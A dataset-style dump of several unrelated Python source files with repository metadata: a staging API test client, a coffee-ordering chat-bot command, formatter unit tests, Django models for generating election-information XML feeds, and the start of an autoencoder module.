| 2021-01-14T10:30:10.861222
| 2015-11-10T03:13:42
| 2015-11-10T03:13:42
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,724
|
py
|
import json
import uuid
import requests
PASSWORD = 'testpassword'
#QUEST_ID = 658
#QUEST_ID = 926 #staging smilie
QUEST_ID = 7004
PLAYBACK_DATA = ''
TEST_USERNAME = 'test_account__'
TEST_PASSWORD = 'testaccount'
class ApiError(Exception):
pass
class HttpError(Exception):
pass
class ApiConsumer(object):
def __init__(self):
self.session_id = None
def call(self, endpoint, params={}):
payload = json.dumps(params)
headers = {
'content-type': 'application/json',
}
if self.session_id:
headers['X-SESSIONID'] = self.session_id
ret = requests.post('http://api.staging.example.com/' + endpoint, data=payload, headers=headers)
if ret.status_code != 200:
raise HttpError(ret.status_code)
if not ret.json.get('success'):
raise ApiError(ret.json)
return ret.json
def signup(self, username=None):
if not username:
username = '_TEST_' + str(uuid.uuid4())[-10:].replace('-', '_')
ret = self.call('auth/signup', {
'username': username,
'email': '{}@example.example'.format(username),
'password': PASSWORD,
})
self.session_id = ret['sessionid']
def heavy_state_sync(self):
return self.call('heavy_state_sync')
def onboarding_quest(self):
return self.call('quests/onboarding')
def quest_comments(self, quest_id):
return self.call('quests/comments', {'quest_id': quest_id})
class DrawquestTransaction(object):
def __init__(self):
self.custom_timers = {}
def main(trans_cls):
trans = trans_cls()
trans.run()
print trans.custom_timers
|
[
"alex.ehlke@gmail.com"
] |
alex.ehlke@gmail.com
|
e80bbd400c9eb77464d747268c9691a9848a9705
|
af955fdd32cf9f6cb74b4f58cada1683063ccb59
|
/hal_commands.py
|
b1bd49708ffeff2c0695e4b16f66699c15c26a9a
|
[] |
no_license
|
Pepedou/HAL-9000
|
b2ec753cf73458c13fb95595221e535a57f27e98
|
54c742bc7212a0f6756069754c9863f6a4c54d67
|
refs/heads/master
| 2020-12-31T07:34:16.522196
| 2017-03-29T04:09:08
| 2017-03-29T04:09:08
| 86,535,698
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,115
|
py
|
__author__ = 'José Luis Valencia Herrera'
import os
import plivo_text_to_speech
import utils
class HalCommandTypes:
COFFEE_COMMAND = "coffee"
class HalCommand:
def __init__(self):
self.raw_request = ""
self.requesting_user = ""
self.command_arguments = []
def execute(self):
pass
class HalCommandParser:
@staticmethod
def parse_command_from_message_text(message_text: str):
parsed_command = {}
split_message = message_text.split(' ')
if split_message[1] == str(HalCommandTypes.COFFEE_COMMAND):
parsed_command['command_type'] = HalCommandTypes.COFFEE_COMMAND
parsed_command['command_arguments'] = message_text.split('"')[1:]
else:
raise Exception("Unable to parse command type")
return parsed_command
class CoffeeCommand(HalCommand):
COFFEE_HOUSE_NUMBER = os.environ.get('COFFEE_HOUSE_NUMBER', "")
def execute(self):
try:
success = plivo_text_to_speech.send_call(self.COFFEE_HOUSE_NUMBER,
self.requesting_user['real_name_normalized'],
self.command_arguments[0],
self.command_arguments[1])
if success:
if "tarjeta" in self.command_arguments[1].lower():
response_ending = "and a terminal should be brought to you for payment."
else:
response_ending = "and I've requested change for a ${0} bill.".format(self.command_arguments[1])
response = "Affirmative, {0}. I've placed the order \"{1}\" " \
"{2}".format(
self.requesting_user['first_name'],
self.command_arguments[0], response_ending)
else:
response = "I'm sorry {0}, I'm afraid I can't do that. There was an error sending the message. " \
"I think you know what the problem is just as well as I do.".format(
self.requesting_user['first_name'])
except Exception as e:
response = "I'm sorry {0}, I'm afraid I can't do that. There was an error sending the message. " \
"I think you know what the problem is just as well as I do. Error: {1}".format(
self.requesting_user['first_name'], str(e))
return response
class HalCommandBuilder:
@staticmethod
def build_command_from_event(command_event):
parsed_command = HalCommandParser.parse_command_from_message_text(command_event['text'])
if parsed_command['command_type'] == HalCommandTypes.COFFEE_COMMAND:
coffee_command = CoffeeCommand()
coffee_command.requesting_user = utils.get_user_by_id(command_event['user'])['profile']
coffee_command.command_arguments = parsed_command['command_arguments']
return coffee_command
else:
raise Exception("Unhandled command type")
|
[
"pepedou@gmail.com"
] |
pepedou@gmail.com
|
40d86f8b94472be347d9dfd40e701d0c50a4370d
|
ac85e1ba9b5cf9e72698705560be1e9470a13c48
|
/test_formater.py
|
ae4b33023f1dffd058513074b53a8f2068e78b84
|
[] |
no_license
|
FernandaHinojosa/testing
|
79c7a3bae92a09a383acee2c877b5dd1aa206671
|
7f43eaf47591a80f16749041524f61d624ac0975
|
refs/heads/master
| 2021-07-24T05:40:47.254881
| 2017-11-06T14:16:29
| 2017-11-06T14:16:29
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,200
|
py
|
from unittest import TestCase
from main import Formater
import sys
sys.tracebacklimit = 0
class TestFormater(TestCase):
def setUp(self):
print(self._testMethodDoc)
def tearDown(self):
pass
def test_clean_integers(self):
"""-- Test Clean Integers"""
msg = "The correct numerical value is not being returned"
self.assertEqual(Formater.clean_number('9, 000 000'), 9000000, msg=msg)
self.assertEqual(Formater.clean_number('5'), 5, msg=msg)
self.assertEqual(Formater.clean_number('58, 710, 520'), 58710520, msg=msg)
def test_correct_int_cast(self):
"""-- Test Int Cast """
msg = "The correct type is not being returned for the integers"
self.assertIsInstance(Formater.clean_number('9, 000 000'), int, msg=msg)
self.assertIsInstance(Formater.clean_number('5'), int)
self.assertIsInstance(Formater.clean_number('58, 710, 520'), int, msg=msg)
def test_clean_floats(self):
pass
def test_correct_float_cast(self):
pass
def test_comma_afther_dot(self):
pass
def test_multiple_dots(self):
pass
def test_no_valid_entrys(self):
pass
|
[
"red2000ace@gmail.com"
] |
red2000ace@gmail.com
|
566d49bca2e69081ec3642a0f489a87b16e2ca06
|
3da85bca3dcedda942a7143393f84dd0132620ee
|
/vip52/models.py
|
3d311f0ff15d2113a5e8ffd26c939e8f47184b0e
|
[] |
no_license
|
afsmythe/vip_feed_builder
|
ff9320b72de76f6b73b6fc6e62ab283ce629fc67
|
ee68a717284b72437435315c9a10510ab59b457e
|
refs/heads/main
| 2023-07-14T00:04:29.672211
| 2021-08-18T22:07:54
| 2021-08-18T22:07:54
| 397,379,596
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 32,265
|
py
|
from django.core.exceptions import ObjectDoesNotExist
from django.db import models
from django.forms import model_to_dict, fields_for_model
from lxml import etree
from lxml.etree import Element
import pprint
def xml_element(model):
sequence = fields_for_model(model, exclude = ['id']).keys()
dict = model_to_dict(model, exclude = ['id'])
element = etree.Element(model.__class__.__name__, attrib = {'id': str(model.id)})
e_dict = dict
#e_dict = self.dict()
for i in sequence:
key, val = i, e_dict[i]
#for key, val in e_dict.items():
if isinstance(val, list) and len(val) > 0:
#print(val)
child = Element(key)
l = []
for i in val:
#check if type is a sub-type.
if isinstance(i, InternationalizedText):
#todo add .xml() method to InternationalizedText model
it_child = Element('Text', attrib = {'language': i.Language})
it_child.text = i.LanguageString
child.append(it_child)
element.append(child)
elif isinstance(i, ExternalIdentifier):
for ed in val:
child = Element(key)
child.append(ed.xml())
elif isinstance(i, LatLng):
latlng = LatLng.objects.get(id = i.id)
child = latlng.xml()
element.append(child)
elif isinstance(i, Schedule):
print('Schedule found')
schedule = Schedule.objects.get(id = i.id)
child = schedule.xml()
element.append(child)
elif isinstance(i, SimpleAddressType):
print('Structured Address')
structuredaddress = SimpleAddressType.objects.get(id = i.id)
child = structuredaddress.xml()
element.append(child)
elif isinstance(i, ElectionNotice):
print('Election Notice')
notice = ElectionNotice.objects.get(id = i.id)
child = notice.xml()
element.append(child)
else:
#it is not a sub-type, is IDXREFS
l.append(str(i.id))
child.text = " ".join(l)
element.append(child)
else:
if key == 'Date':
date = Element('Date')
date.text = str(val)
element.append(date)
elif val is None or val == '' or len(val) == 0:
#elif val is None or val == '':
continue
elif key == 'Department':
print('Department')
dep = Department.objects.get(id = val)
child = dep.xml()
element.append(child)
try:
vs = VoterService.objects.get(id = dep.VoterService_id)
print('VoterService')
child.append(vs.xml())
except:
ObjectDoesNotExist
# elif key == 'VoterService':
# print('Voter Service')
# vs = VoterService.objects.get(id = val)
# child = vs.xml()
# element.append(child)
else:
#regular value
child = Element(key)
child.text = str(val)
element.append(child)
return(element)
# Create your models here.
class Source(models.Model):
id = models.CharField(primary_key = True, max_length = 50)
Name = models.CharField(max_length = 500, blank = True, null = True)
VipId = models.CharField(max_length = 50, blank = True, null = True)
DateTime = models.CharField(max_length = 50, blank = True, null = True)
class InternationalizedText(models.Model):
Language = models.CharField(max_length = 2, default = 'en')
LanguageString = models.CharField(max_length = 5000)
def __str__(self):
return("{}: {}".format(self.Language, self.LanguageString))
def xml(self):
it_element = Element('Text', attrib = {'language': self.Language})
it_element.text = self.LanguageString
return(it_element)
class ExternalIdentifier(models.Model):
Type = models.CharField(max_length = 50, blank = True, null = True)
OtherType = models.CharField(max_length = 100, blank = True, null = True)
Value = models.CharField(max_length = 100, blank = True, null = True)
def __str__(self):
return("{}: {}".format(self.Type, self.Value))
def dict(self):
return(model_to_dict(self, exclude = ['id']))
def xml(self):
element = Element('ExternalIdentifier')
for key, val in self.dict().items():
if val is not None:
child = Element(key)
child.text = str(val)
element.append(child)
return(element)
class Hours(models.Model):
StartTime = models.CharField(max_length = 50, blank = True, null = True)
EndTime = models.CharField(max_length = 50, blank = True, null = True)
def xml(self):
return(xml_element(self))
class Schedule(models.Model):
Hours = models.ManyToManyField(Hours, blank = True, max_length = 1000)
IsOnlyByAppointment = models.CharField(max_length = 50, blank = True, null = True)
IsOrByAppointment = models.CharField(max_length = 50, blank = True, null = True)
IsSubjectToChange = models.CharField(max_length = 50, blank = True, null = True)
StartDate = models.CharField(max_length = 50, blank = True, null = True)
EndDate = models.CharField(max_length = 50, blank = True, null = True)
def xml(self):
schedule = etree.Element('Schedule')
for key, val in model_to_dict(self, exclude = ['id']).items():
if isinstance(val, list):
for ho in val:
child = ho.xml()
schedule.append(child)
elif val != None:
child = Element(key)
child.text = str(val)
schedule.append(child)
return(schedule)
class HoursOpen(models.Model):
id = models.CharField(primary_key = True, max_length = 50)
Schedule = models.ManyToManyField(Schedule, blank = True, max_length = 1000)
def xml(self):
hoursopen = etree.Element('HoursOpen', attrib = {'id':self.id})
for key, val in model_to_dict(self, exclude = ['id']).items():
if isinstance(val, list):
for sch in val:
child = sch.xml()
hoursopen.append(child)
else:
child = Element(key)
child.text = str(val)
hoursopen.append(child)
return(hoursopen)
class LatLng(models.Model):
Latitude = models.CharField(max_length = 50)
Longitude = models.CharField(max_length = 50)
Source = models.CharField(max_length = 50, blank = True, null = True)
def __str__(self):
return("{}: {}, {}".format(self.Source, self.Latitude, self.Longitude))
def xml(self):
sequence = fields_for_model(self, exclude = ['id']).keys()
dict = model_to_dict(self, exclude = ['id'])
element = etree.Element('LatLng')
for key in sequence:
val = dict[key]
#for key, val in model_to_dict(self, exclude = ['id']).items():
#print(key, val)
if val != None or val != '':
child = Element(key)
child.text = str(val)
element.append(child)
latlng = model_to_dict(self, exclude = ['id'])
return(element)
class ContactInformation(models.Model):
AddressLine = models.CharField(max_length = 1000, blank = True, null = True)
Directions = models.ManyToManyField(InternationalizedText, blank = True, max_length = 200)
Email = models.CharField(max_length = 100, blank = True, null = True)
Fax = models.CharField(max_length = 100, blank = True, null = True)
HoursOpenId = models.CharField(max_length = 100, blank = True, null = True)
LatLng = models.CharField(max_length = 100, blank = True, null = True)
Name = models.CharField(max_length = 1000, blank = True, null = True)
Phone = models.CharField(max_length = 100, blank = True, null = True)
Uri = models.URLField(blank = True, null = True)
parent_id = models.CharField(max_length = 100, blank = True, null = True)
def dict(self):
return(model_to_dict(self, exclude = ['id','parent_id']))
def xml(self):
element = Element('ContactInformation')
for key, val in self.dict().items():
if isinstance(val, list) and len(val) > 0:
child = Element(key)
it_child = Element('Text', attrib = {'language': i.Language})
it_child.text = i.LanguageString
child.append(it_child)
element.append(child)
else:
if val is None or val == '' or len(val) == 0:
continue
else:
child = Element(key)
child.text = str(val)
element.append(child)
return(element)
class Party(models.Model):
id = models.CharField(primary_key = True, max_length = 50)
Abbreviation = models.CharField(max_length = 50, blank = True, null = True)
Color = models.CharField(max_length = 10, blank = True, null = True)
ExternalIdentifiers = models.ManyToManyField(ExternalIdentifier, blank = True, max_length = 1000)
IsWriteIn = models.CharField(max_length = 10, blank = True, null = True)
LogoUri = models.URLField(blank = True, null = True)
Name = models.ManyToManyField(InternationalizedText, blank = True, max_length = 200)
class Person(models.Model):
id = models.CharField(primary_key = True, max_length = 50)
ContactInformation = models.ManyToManyField(ContactInformation, blank = True, max_length = 1000)
DateOfBirth = models.DateTimeField(blank = True, null = True)
ExternalIdentifiers = models.ManyToManyField(ExternalIdentifier, blank = True, max_length = 1000)
FirstName = models.CharField(max_length = 50, blank = True, null = True)
FullName = models.ManyToManyField(InternationalizedText, blank = True, max_length = 200, related_name = 'person_full_name')
Gender = models.CharField(max_length = 50, blank = True, null = True)
LastName = models.CharField(max_length = 50, blank = True, null = True)
MiddleName = models.CharField(max_length = 50, blank = True, null = True)
Nickname = models.CharField(max_length = 50, blank = True, null = True)
PartyId = models.ForeignKey(Party, on_delete = models.CASCADE, db_column = 'PartyId', blank = True, null = True)
Prefix = models.CharField(max_length = 50, blank = True, null = True)
Profession = models.ManyToManyField(InternationalizedText, blank = True, max_length = 200, related_name = 'person_profession')
Suffix = models.CharField(max_length = 50, blank = True, null = True)
Title = models.ManyToManyField(InternationalizedText, blank = True, max_length = 200, related_name = 'person_title')
class Candidate(models.Model):
id = models.CharField(primary_key = True, max_length = 50)
BallotName = models.ManyToManyField(InternationalizedText, blank = True, max_length = 200)
ContactInformation = models.ManyToManyField(ContactInformation, blank = True, max_length = 1000)
ExternalIdentifiers = models.ManyToManyField(ExternalIdentifier, blank = True, max_length = 1000)
FileDate = models.CharField(max_length = 50, blank = True, null = True)
IsIncumbent = models.CharField(max_length = 50, blank = True, null = True)
IsTopTicket = models.CharField(max_length = 50, blank = True, null = True)
PartyId = models.ForeignKey(Party, on_delete = models.CASCADE, db_column = 'PartyId', blank = True, null = True)
PersonId = models.ForeignKey(Person, on_delete = models.CASCADE, db_column = 'PersonId', blank = True, null = True)
PostElectionStatus = models.CharField(max_length = 50, blank = True, null = True)
PreElectionStatus = models.CharField(max_length = 50, blank = True, null = True)
SequenceOrder = models.CharField(max_length = 50, blank = True, null = True)
class BallotMeasureSelection(models.Model):
id = models.CharField(primary_key = True, max_length = 50)
Selection = models.ManyToManyField(InternationalizedText, blank = True, max_length = 200)
SequenceOrder = models.CharField(max_length = 50, blank = True, null = True)
def __str__(self):
return(self.id)
class BallotMeasureContest(models.Model):
id = models.CharField(primary_key = True, max_length = 50)
Abbreviation = models.CharField(max_length = 100, blank = True, null = True)
BallotSelectionIds = models.ManyToManyField(BallotMeasureSelection, blank = True, max_length = 1000)
BallotSubTitle = models.ManyToManyField(InternationalizedText, related_name = 'bmc_ballot_sub_title',blank = True, max_length = 200)
BallotTitle = models.ManyToManyField(InternationalizedText, related_name = 'bmc_ballot_title',blank = True, max_length = 200)
ElectoralDistrictId = models.ForeignKey('ElectoralDistrict', blank = True, db_column = 'ElectoralDistrictId', on_delete = models.CASCADE)
ElectorateSpecification = models.ManyToManyField(InternationalizedText, related_name = 'bmc_electorate_specification',blank = True, max_length = 200)
ExternalIdentifiers = models.ManyToManyField(ExternalIdentifier, blank = True, max_length = 200)
HasRotation = models.CharField(max_length = 50, blank = True, null = True)
Name = models.CharField(max_length = 100, blank = True, null = True)
SequenceOrder = models.CharField(max_length = 100, blank = True, null = True)
VoteVariation = models.CharField(max_length = 100, blank = True, null = True)
OtherVoteVariation = models.CharField(max_length = 100, blank = True, null = True)
ConStatement = models.ManyToManyField(InternationalizedText, related_name = 'bmc_con_statement', blank = True, max_length = 200)
EffectOfAbstain = models.ManyToManyField(InternationalizedText, related_name = 'bmc_effect_of_abstain',blank = True, max_length = 200)
FullText = models.ManyToManyField(InternationalizedText, related_name = 'bmc_full_text',blank = True, max_length = 200)
InfoUri = models.URLField(blank = True, null = True)
PassageThreshold = models.ManyToManyField(InternationalizedText, related_name = 'bmc_passage_threshold',blank = True, max_length = 200)
ProStatement = models.ManyToManyField(InternationalizedText, related_name = 'bmc_pro_statement',blank = True, max_length = 200)
SummaryText = models.ManyToManyField(InternationalizedText, related_name = 'bmc_summary_text',blank = True, max_length = 200)
Type = models.CharField(max_length = 50, blank = True, null = True)
OtherType = models.CharField(max_length = 50, blank = True, null = True)
class CandidateSelection(models.Model):
id = models.CharField(primary_key = True, max_length = 50)
SequenceOrder = models.CharField(max_length = 50, blank = True, null = True)
CandidateIds = models.ManyToManyField(Candidate, blank = True, max_length = 200)
EndorsementPartyIds = models.ManyToManyField(Party, blank = True, max_length = 200)
IsWriteIn = models.CharField(max_length = 50, blank = True, null = True)
class CandidateContest(models.Model):
id = models.CharField(primary_key = True, max_length = 100)
Abbreviation = models.CharField(max_length = 100, blank = True, null = True)
BallotSelectionIds = models.ManyToManyField(CandidateSelection, blank = True, max_length = 1000)
BallotSubTitle = models.ManyToManyField(InternationalizedText, related_name = 'cc_ballot_sub_title',blank = True, max_length = 200)
BallotTitle = models.ManyToManyField(InternationalizedText, related_name = 'cc_ballot_title',blank = True, max_length = 200)
ElectoralDistrictId = models.ForeignKey('ElectoralDistrict',on_delete = models.CASCADE, db_column = 'ElectoralDistrictId', max_length = 1000)
ElectorateSpecification = models.ManyToManyField(InternationalizedText, related_name = 'cc_electorate_specification', blank = True, max_length = 200)
ExternalIdentifiers = models.ManyToManyField(ExternalIdentifier, blank = True, max_length = 1000)
HasRotation = models.CharField(max_length = 1000, blank = True, null = True)
Name = models.CharField(max_length = 2000, blank = True, null = True)
SequenceOrder = models.CharField(max_length = 100, blank = True, null = True)
VoteVariation = models.CharField(max_length = 100, blank = True, null = True)
OtherVoteVariation = models.CharField(max_length = 100, blank = True, null = True)
NumberElected = models.CharField(max_length = 100, blank = True, null = True)
OfficeIds = models.ManyToManyField('Office', blank = True, max_length = 1000)
PrimaryPartyIds = models.ManyToManyField('Party', blank = True, max_length = 1000)
VotesAllowed = models.CharField(max_length = 100, blank = True, null = True)
class Election(models.Model):
id = models.CharField(primary_key = True, max_length = 50)
Date = models.CharField(max_length = 50, blank = True, null = True)
HoursOpenId = models.CharField(max_length = 50, blank = True, null = True)
PollingHours = models.ManyToManyField(InternationalizedText, blank = True, max_length = 200, related_name = 'election_hours')
ElectionType = models.ManyToManyField(InternationalizedText, blank = True, max_length = 200, related_name = 'election_type')
StateId = models.ForeignKey('State', on_delete=models.CASCADE, db_column = 'StateId')
IsStatewide = models.CharField(max_length = 10, blank = True, null = True)
Name = models.ManyToManyField(InternationalizedText, blank = True, max_length = 200, related_name = 'election_name')
RegistrationInfo = models.ManyToManyField(InternationalizedText, blank = True, max_length = 200, related_name = 'election_registration_info')
AbsenteeBallotInfo = models.ManyToManyField(InternationalizedText, blank = True, max_length = 200, related_name = 'absentee_ballot_info')
ResultsUri = models.URLField(blank = True, null = True)
HasElectionDayRegistration = models.CharField(max_length = 10, blank = True, null = True)
RegistrationDeadline = models.CharField(max_length = 50, blank = True, null = True)
AbsenteeRequestDeadline = models.CharField(max_length = 50, blank = True, null = True)
class VoterService(models.Model):
id = models.CharField(primary_key = True, max_length = 50)
Description = models.ForeignKey(InternationalizedText, blank = True, max_length = 2000, on_delete = models.CASCADE)
Type = models.CharField(max_length = 50, blank = True, null = True)
def dict(self):
return(model_to_dict(self, exclude = ['id']))
def xml(self):
element = etree.Element('VoterService')
for key, val in self.dict().items():
if key == 'Description':
child = Element('Description')
it = InternationalizedText.objects.get(id = val)
child.append(it.xml())
else:
if val is None or val == '' or len(val) == 0:
continue
else:
child = Element(key)
child.text = str(val)
element.append(child)
return(element)
class Department(models.Model):
id = models.CharField(primary_key = True, max_length = 50)
ContactInformation = models.ManyToManyField(ContactInformation, blank = True, max_length = 1000)
ElectionOfficialPersonId = models.ForeignKey(Person, db_column = 'ElectionOfficialPersonId', on_delete = models.CASCADE, blank = True, null = True)
VoterService = models.ForeignKey(VoterService, on_delete = models.CASCADE, blank = True, null = True)
election_administration_id = models.CharField(max_length = 50, blank = True, null = True)
#def __str__(self):
# return(self.ContactInformation)
def dict(self):
return(model_to_dict(self, exclude = ['id']))
def xml(self):
element = etree.Element('Department')
for key, val in self.dict().items():
if isinstance(val, list) and len(val) > 0:
for i in val:
child = Element(key)
it_child = Element('Text', attrib = {'language': i.Language})
it_child.text = i.LanguageString
child.append(it_child)
element.append(child)
# elif key == 'VoterService':
# print('Voter Service')
# vs = VoterService.objects.get(id = val)
# child = vs.xml()
# element.append(child)
else:
if val is None or val == '' or len(val) == 0:
continue
else:
child = Element(key)
child.text = str(val)
element.append(child)
return(element)
class ElectionNotice(models.Model):
NoticeText = models.ManyToManyField(InternationalizedText, blank = True, max_length = 5000)
NoticeUri = models.URLField(blank = True, null = True)
def dict(self):
return(model_to_dict(self, exclude = ['id']))
def xml(self):
element = Element('ElectionNotice')
for key, val in self.dict().items():
if isinstance(val, list) and len(val) > 0:
for i in val:
child = Element(key)
it_child = Element('Text', attrib = {'language': i.Language})
it_child.text = i.LanguageString
child.append(it_child)
element.append(child)
else:
if val is None or val == '' or len(val) == 0:
continue
else:
child = Element(key)
child.text = str(val)
element.append(child)
return(element)
class ElectionAdministration(models.Model):
id = models.CharField(primary_key = True, max_length = 50)
AbsenteeUri = models.URLField(blank = True, null = True)
AmIRegisteredUri = models.URLField(blank = True, null = True)
BallotTrackingUri = models.URLField(blank = True, null = True)
BallotProvisionalTrackingUri = models.URLField(blank = True, null = True)
Department = models.ForeignKey(Department, on_delete = models.CASCADE, max_length = 2000, default = 'dep1')
ElectionNotice = models.ManyToManyField(ElectionNotice, blank = True, null = True)
ElectionsUri = models.URLField(max_length = 1000, blank = True, null = True)
RegistrationUri = models.URLField(blank = True, null = True)
RulesUri = models.URLField(blank = True, null = True)
WhatIsOnMyBallotUri = models.URLField(blank = True, null = True)
WhereDoIVoteUri = models.URLField(blank = True, null = True)
class ElectoralDistrict(models.Model):
id = models.CharField(primary_key = True, max_length = 50)
ExternalIdentifiers = models.ManyToManyField(ExternalIdentifier, blank = True, max_length = 1000)
Name = models.CharField(blank = True, null = True ,max_length = 100)
Number = models.CharField(blank = True, null = True ,max_length = 50)
Type = models.CharField(blank = True, null = True ,max_length = 50)
OtherType = models.CharField(blank = True, null = True ,max_length = 50)
def __str__(self):
return("Name: {}; Number: {}".format(self.Name, self.Number))
class Office(models.Model):
id = models.CharField(primary_key = True, max_length = 50)
ContactInformation = models.ManyToManyField(ContactInformation, blank = True, max_length = 1000)
Description = models.ManyToManyField(InternationalizedText, blank = True, max_length = 200, related_name = 'office_description')
ElectoralDistrictId = models.ForeignKey(ElectoralDistrict, db_column = 'ElectoralDistrictId', on_delete = models.CASCADE, blank = True, null = True)
ExternalIdentifiers = models.ManyToManyField(ExternalIdentifier, blank = True, max_length = 1000)
FilingDeadline = models.CharField(blank = True, null = True, max_length = 100)
IsPartisan = models.CharField(blank = True, null = True, max_length = 100)
Name = models.ManyToManyField(InternationalizedText, blank = True, max_length = 200, related_name = 'office_name')
OfficeHolderPersonIds = models.ManyToManyField(Person, blank = True)
Term = models.CharField(blank = True, null = True, max_length = 100)
class Locality(models.Model):
id = models.CharField(primary_key = True, max_length = 50)
ElectionAdministrationId = models.ForeignKey('ElectionAdministration', on_delete = models.CASCADE, db_column = 'ElectionAdministrationId', blank = True, null = True)
ExternalIdentifiers = models.ManyToManyField(ExternalIdentifier, blank = True, max_length = 1000)
IsMailOnly = models.CharField(max_length = 50, blank = True, null = True)
Name = models.CharField(max_length = 100, blank = False, default = None)
PollingLocationIds = models.ManyToManyField('PollingLocation',max_length = 10000, blank = True)
StateId = models.ForeignKey('State', on_delete = models.CASCADE, db_column = 'StateId', blank = True, null = True)
Type = models.CharField(blank = True, null = True, max_length = 100)
OtherType = models.CharField(blank = True, null = True, max_length = 100)
# def __str__(self):
# return(self.Name)
class SimpleAddressType(models.Model):
Line1 = models.CharField(max_length = 100)
Line2 = models.CharField(blank = True, null = True, max_length = 100, default = '')
Line3 = models.CharField(blank = True, null = True, max_length = 100, default = '')
City = models.CharField(max_length = 100)
State = models.CharField(max_length = 100)
Zip = models.CharField(blank = True, null = True, max_length = 100, default = "")
def dict(self):
dict = model_to_dict(self, exclude = ['id'])
sequence = fields_for_model(self, exclude = ['id']).keys()
for i in sequence:
o_dict = collections.OrderedDict(i = dict[i])
return(o_dict)
#return(model_to_dict(self, exclude = ['id']))
def xml(self):
element = Element('AddressStructured')
dict = model_to_dict(self, exclude = ['id'])
sequence = fields_for_model(self, exclude = ['id']).keys()
for i in sequence:
val = dict[i]
if val is not None:
child = Element(i)
child.text = str(val)
element.append(child)
return(element)
class PollingLocation(models.Model):
id = models.CharField(primary_key = True, max_length = 50)
AddressStructured = models.ManyToManyField(SimpleAddressType, blank = True, null = True)
AddressLine = models.CharField(blank = True, null = True, max_length = 1000)
Directions = models.ManyToManyField(InternationalizedText, blank = True, max_length = 200, related_name = 'pl_directions')
Hours = models.ManyToManyField(InternationalizedText, blank = True, max_length = 200)
#HoursOpenId = models.ForeignKey('HoursOpen', on_delete=models.CASCADE, blank = True, null = True)
HoursOpenId = models.ForeignKey(HoursOpen, db_column = 'HoursOpenId', on_delete = models.SET_NULL, max_length = 50, blank = True, null = True)
IsDropBox = models.CharField(max_length = 50, blank = True, null = True, default = 'false')
IsEarlyVoting = models.CharField(max_length = 50, blank = True, null = True, default = 'false')
LatLng = models.ManyToManyField(LatLng, db_column = 'LatLng', max_length = 50, null = True, blank = True)
Name = models.CharField(blank = True, null = True, max_length = 1000)
PhotoUri = models.URLField(blank = True, null = True)
def __str__(self):
return(self.Name)
class OrderedContest(models.Model):
id = models.CharField(primary_key = True, max_length = 50)
ContestId = models.ForeignKey(CandidateContest, db_column = 'ContestId', on_delete = models.CASCADE, max_length = 50, blank = True, null = True)
OrderedBallotSelectionIds = models.ManyToManyField(CandidateSelection, blank = True, max_length = 1000)
class BallotStyle(models.Model):
id = models.CharField(primary_key = True, max_length = 50)
ImageUri = models.URLField(blank = True, null = True)
OrderedContestIds = models.ManyToManyField(OrderedContest, blank = True, max_length = 1000)
PartyIds = models.ManyToManyField(Party, blank = True, max_length = 1000)
class Precinct(models.Model):
id = models.CharField(primary_key = True, max_length = 50)
BallotStyleId = models.ForeignKey(BallotStyle, db_column = 'BallotStyleId', on_delete = models.CASCADE, max_length = 50, blank = True, null = True)
ElectoralDistrictIds = models.ManyToManyField(ElectoralDistrict, max_length = 1000, blank = True)
ExternalIdentifiers = models.ManyToManyField(ExternalIdentifier, blank = True, max_length = 1000)
IsMailOnly = models.CharField(max_length = 50, blank = True, null = True)
LocalityId = models.ForeignKey(Locality, db_column = 'LocalityId', on_delete = models.CASCADE, max_length = 50)
Name = models.CharField(max_length = 200, blank = True, null = True)
Number = models.CharField(max_length = 50, blank = True, null = True)
PollingLocationIds = models.ManyToManyField(PollingLocation,max_length = 1000, blank = True)
PrecinctSplitName = models.CharField(max_length = 50, blank = True, null = True)
Ward = models.CharField(max_length = 50, blank = True, null = True)
def __str__(self):
return("{} ({})".format(self.Name, self.LocalityId.Name))
class State(models.Model):
id = models.CharField(primary_key = True, max_length = 50, default = "st1")
ElectionAdministrationId = models.ForeignKey(ElectionAdministration, on_delete = models.CASCADE, db_column = 'ElectionAdministrationId', blank = True, null = True)
ExternalIdentifiers = models.ManyToManyField(ExternalIdentifier, blank = True, max_length = 1000)
Name = models.CharField(max_length = 50, blank = True, null = True)
PollingLocationIds = models.ManyToManyField(PollingLocation, max_length = 1000, blank = True)
def __str__(self):
return(self.Name)
def dict(self):
return(model_to_dict(self, exclude = ['id']))
class StreetSegment(models.Model):
id = models.CharField(primary_key = True, max_length = 50)
AddressDirection = models.CharField(max_length = 50, blank = True, null = True)
City = models.CharField(max_length = 50, blank = True, null = True)
IncludesAllAddresses = models.CharField(max_length = 50, blank = True, null = True)
IncludesAllStreets = models.CharField(max_length = 50, blank = True, null = True)
OddEvenBoth = models.CharField(max_length = 50, blank = True, null = True)
PrecinctId = models.ForeignKey(Precinct, on_delete = models.CASCADE, db_column = 'PrecinctId')
StartHouseNumber = models.CharField(max_length = 50, blank = True, null = True)
EndHouseNumber = models.CharField(max_length = 50, blank = True, null = True)
HouseNumberPrefix = models.CharField(max_length = 50, blank = True, null = True)
HouseNumberSuffix = models.CharField(max_length = 50, blank = True, null = True)
State = models.CharField(max_length = 50, blank = True, null = True)
StreetDirection = models.CharField(max_length = 50, blank = True, null = True)
StreetName = models.CharField(max_length = 50, blank = True, null = True)
StreetSuffix = models.CharField(max_length = 50, blank = True, null = True)
UnitNumber = models.CharField(max_length = 500, blank = True, null = True)
Zip = models.CharField(max_length = 50, blank = True, null = True)
class Error(models.Model):
id_error = models.CharField(max_length = 50, blank = True, null = True)
error_object = models.CharField(max_length = 50, blank = True, null = True)
error_message = models.CharField(max_length = 500, blank = True, null = True)
|
[
"franklin@democracy.works"
] |
franklin@democracy.works
|
5dbd16bad92c13444eb77d53b650fba51d099460
|
7f8cebd9315129bcdb7ef220dc449cda26a19ce4
|
/models/aetanh.py
|
bcff65d94ee5b2f960314125e4beb4f15db6e754
|
[] |
no_license
|
KaiqianZhang/dpcca_v8
|
75477b1768905b6c41838c8da9ff77fba13b5a45
|
1b65fc0c3ec6b182907ba070e859c1d92fc98942
|
refs/heads/master
| 2020-08-30T09:32:58.485684
| 2019-11-11T17:34:55
| 2019-11-11T17:34:55
| 218,334,012
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,639
|
py
|
"""=============================================================================
Autoencoder.
============================================================================="""
import numpy as np
from torch import nn
